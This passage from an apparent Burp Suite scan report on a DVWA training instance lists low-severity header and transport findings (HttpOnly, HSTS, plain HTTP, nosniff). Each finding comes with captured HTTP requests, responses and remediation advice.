Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5930
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=4e98789ed626867505827d1645104bbf; expires=Tue, 22 Oct 2024 09:38:30 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="
...[SNIP]...
12.2. https://pentest-ground.com:4280/security.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/security.php |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request 1
POST /security.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=20f82cc3bfe2f59fa9f8dc5eaf0d9132
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/security.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 80
security=medium&seclev_submit=Submit&user_token=7878af9d1f476a29debc53d941ab743b
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=medium; path=/
Location: /security.php
13. Unencrypted communications
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
http://pentest-ground.com:4280 |
Path: |
/ |
Issue description
The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.
To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.
Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.
Issue remediation
Applications should use transport-level encryption (SSL/TLS) to protect all communications passing between the client and the server. The Strict-Transport-Security HTTP header should be used to ensure that clients refuse to access the server over an insecure connection.
References
Vulnerability classifications
14. Strict transport security not enforced
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Issue detail
This issue was found in multiple locations under the reported path.
Issue background
The application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a legitimate user's network traffic could bypass the application's use of SSL/TLS encryption, and use the application as a platform for attacks against its users. This attack is performed by rewriting HTTPS links as HTTP, so that if a targeted user follows a link to the site from an HTTP page, their browser never attempts to use an encrypted connection. The sslstrip tool automates this process.
To exploit this vulnerability, an attacker must be suitably positioned to intercept and modify the victim's network traffic.This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.
Issue remediation
The application should instruct web browsers to only access the application using HTTPS. To do this, enable HTTP Strict Transport Security (HSTS) by adding a response header with the name 'Strict-Transport-Security' and the value 'max-age=expireTime', where expireTime is the time in seconds that browsers should remember that the site should only be accessed using HTTPS. Consider adding the 'includeSubDomains' flag if appropriate.
Note that because HSTS is a "trust on first use" (TOFU) protocol, a user who has never accessed the application will never have seen the HSTS header, and will therefore still be vulnerable to SSL stripping attacks. To mitigate this risk, you can optionally add the 'preload' flag to the HSTS header, and submit the domain for review by browser vendors.
References
Vulnerability classifications
Request 1
POST /vulnerabilities/javascript/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=047d8dd2ace9aaf1d3f54dd1c349de44
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:36 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8321
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
15. Content Sniffing not disabled
Previous
Next
There are 55 instances of this issue:
Issue description
There was no "X-Content-Type-Options" HTTP header with the value nosniff set in the response. The lack of this header causes that certain browsers, try to determine the content type and encoding of the response even when these properties are defined correctly. This can make the web application vulnerable against Cross-Site Scripting (XSS) attacks. E.g. the Internet Explorer and Safari treat responses with the content type text/plain as HTML, if they contain HTML tags.
Issue remediation
Set the following HTTP header at least in all responses which contain user input: X-Content-Type-Options: nosniff
15.1. http://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
http://pentest-ground.com:4280 |
Path: |
/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:14 GMT
Content-Type: text/html
Content-Length: 657
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
15.2. http://pentest-ground.com:4280/robots.txt
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
http://pentest-ground.com:4280 |
Path: |
/robots.txt |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response 1
HTTP/1.1 400 Bad Request
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:16 GMT
Content-Type: text/html
Content-Length: 657
Connection: close
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
...[SNIP]...
15.3. https://pentest-ground.com:4280/
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET / HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:30 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5930
Connection: close
X-Powered-By: PHP/8.3.12
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=4e98789ed626867505827d1645104bbf; expires=Tue, 22 Oct 2024 09:38:30 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="
...[SNIP]...
15.4. https://pentest-ground.com:4280/README.ar.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.ar.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /README.ar.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=492559470e1d1532b619f28972a798ef
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:46 GMT
Content-Type: text/markdown
Content-Length: 25027
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "61c3-60aa7c44ac3ca"
Accept-Ranges: bytes
# DAMN VULNERABLE WEB APPLICATION
.... Damn Vulnerable Web Application (DVWA) .... .......... ...... .... ............ .......... .......... .... PHP / MySQL. .......... .............. .... ........
...[SNIP]...
15.5. https://pentest-ground.com:4280/README.es.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.es.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /README.es.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e3d105c12bab570377954ff8fef5161a
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:54 GMT
Content-Type: text/markdown
Content-Length: 21777
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "5511-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: es
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA) es una aplicaci..n web hecha en PHP/MySQL que es extremadamente vulnerable. Su principal objetivo es ayudar a profesionales de
...[SNIP]...
15.6. https://pentest-ground.com:4280/README.fa.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.fa.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /README.fa.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f645cd9901dfcd217cc382a83297b7b7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:51 GMT
Content-Type: text/markdown
Content-Length: 30612
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "7794-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: fa
# ................ ...... .............. ...................
................ ...... .............. ................... (DVWA).. .... ................ ...... .......... .... ................../.......
...[SNIP]...
15.7. https://pentest-ground.com:4280/README.fr.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.fr.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /README.fr.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=8b04c2a5e0f29ba02562bbe4b431aa36
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:50 GMT
Content-Type: text/markdown
Content-Length: 20674
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "50c2-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: fr
# Translation / Traduction
Philibert Gentil...@[Philibert-Gentil](https://github.com/Philibert-Gentil)
Vous pouvez me contacter en cas d'erreur de traduction / d'interpr..tation.
- - -
# DAMN VULNE
...[SNIP]...
15.8. https://pentest-ground.com:4280/README.pt.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.pt.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /README.pt.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d3e2bad7ac45eec22b45a259f5624a6f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:53 GMT
Content-Type: text/markdown
Content-Length: 21239
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "52f7-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: pt
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA) .. um aplicativo web em PHP/MySQL que .. extremamente vulner..vel. Seu principal objetivo .. auxiliar profissionais de seguran
...[SNIP]...
15.9. https://pentest-ground.com:4280/README.tr.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.tr.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /README.tr.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6c9595aea1e31eff4f63fb4bdd18a1f3
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:56 GMT
Content-Type: text/markdown
Content-Length: 19838
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "4d7e-60aa7c44ac3ca"
Accept-Ranges: bytes
Content-Language: tr
# DAMN VULNERABLE WEB APPLICATION
Damn Vulnerable Web Application (DVWA), son derece zafiyetli bir PHP/MySQL web uygulamas..d..r. Temel amac..; g..venlik uzmanlar..na, yeteneklerini ve ara..lar..n..
...[SNIP]...
15.10. https://pentest-ground.com:4280/README.zh.md
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/README.zh.md |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /README.zh.md HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ebbb7d8c32683657d5128f2d3f90d743
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:48 GMT
Content-Type: text/markdown
Content-Length: 17394
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "43f2-60aa7c44ac3ca"
Accept-Ranges: bytes
# ......
.........@[inVains](https://github.com/inVains) @[songzy12](https://github.com/songzy12) @[cnskis](https://github.com/cnskis)
- - -
# ...... DAMN VULNERABLE WEB APPLICATION...DVWA...
Damn
...[SNIP]...
15.11. https://pentest-ground.com:4280/about.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/about.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /about.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=bd4354577682343786a08203c3601069
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5198
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>About :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
15.12. https://pentest-ground.com:4280/compose.yml
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/compose.yml |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /compose.yml HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4d986ec27a888ace189d8ceaa8016b47
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:00 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 280
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apach
...[SNIP]...
15.13. https://pentest-ground.com:4280/config/config.inc.php
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/config/config.inc.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /config/config.inc.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=887b5206538ce1e025ee586761a3df33
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
15.14. https://pentest-ground.com:4280/docs/DVWA_v1.3.pdf
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/DVWA_v1.3.pdf |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /docs/DVWA_v1.3.pdf HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=33b54a2ee3adcc13612ba6943ddba842
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/instructions.php?doc=PDF
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:43 GMT
Content-Type: application/pdf
Content-Length: 422011
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "6707b-60aa7c44ae30b"
Accept-Ranges: bytes
%PDF-1.3
%...........
4 0 obj
<< /Length 5 0 R /Filter /FlateDecode >>
stream
x..V.n.0...+.(.,......-.^.6FrhzHT.qa....;......f....H.N....qFO...H..4..B.fN..@..VQ.%E...|q.1..o.....v%6K.T9;.Tk..Me]S...S.
...[SNIP]...
15.15. https://pentest-ground.com:4280/docs/graphics/docker/detail.png
Previous
Next
Summary
|
Severity: |
Low |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/docs/graphics/docker/detail.png |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Request 1
GET /docs/graphics/docker/detail.png HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=71714f1a9cde023a53997f100bf78363
Referer: https://pentest-ground.com:4280/instructions.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:18 GMT
Content-Type: image/png
Content-Length: 164347
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
